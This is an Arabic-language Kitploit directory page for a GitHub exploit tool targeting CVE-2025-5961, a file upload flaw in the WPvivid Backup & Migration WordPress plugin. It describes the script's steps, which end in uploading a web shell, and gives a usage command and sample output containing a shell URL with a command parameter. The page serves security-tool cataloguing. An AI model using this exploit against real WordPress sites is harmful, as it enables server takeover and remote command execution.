Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5961 — الترحيل، النسخ الاحتياطي، التدريج – WPvivid Backup & Migration <= 0.9.116 - رفع ملفات تعسّفي مُصادَق عليه (مدير+) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-5961
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-5961

CVE-2025-5961

الترحيل، النسخ الاحتياطي، التدريج – WPvivid Backup & Migration <= 0.9.116 - رفع ملفات تعسّفي مُصادَق عليه (مدير+)

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - رفع ملفات تعسفي (بعد المصادقة كمسؤول أو أعلى)

📈 تؤثر هذه الثغرة على إضافة لديها أكثر من 700,000+ عملية تثبيت


📝 تفاصيل CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (عالية)
  • نُشرت: 3 يوليو 2025

🔍 الوصف

الإضافة Migration, Backup, Staging – WPvivid Backup & Migration الخاصة بووردبريس معرّضة لـ رفع ملفات تعسفي بسبب غياب التحقق من نوع الملف في الدالة wpvivid_upload_import_files في جميع الإصدارات حتى 0.9.116 وما يشمله.

يتيح ذلك لـ المهاجمين المصادَق عليهم (بصلاحية مسؤول أو أعلى) رفع ملفات تعسفية إلى الخادم، مما قد يتيح تنفيذ أوامر عن بُعد.


🧰 السكربت

يحتوي هذا المستودع على سكربت استغلال لـ CVE-2025-5961، مكتوب بلغة Python، والذي:

  • يتحقق من إصدار الإضافة.
  • يسجّل الدخول كمسؤول.
  • يستخرج الـ nonce المطلوب من صفحة الإضافة.
  • يرفع حمولة web shell.
  • يطبع الرابط للوصول إلى الـ shell.

🖥️ مثال على الاستخدام

python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ الاستخدام

$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 مثال على المخرجات

[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ إخلاء مسؤولية

هذا السكربت مُقدَّم لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


✍️ بواسطة

Khaled Alenazi (Nxploited)
🌐 GitHub


تنزيل الأداة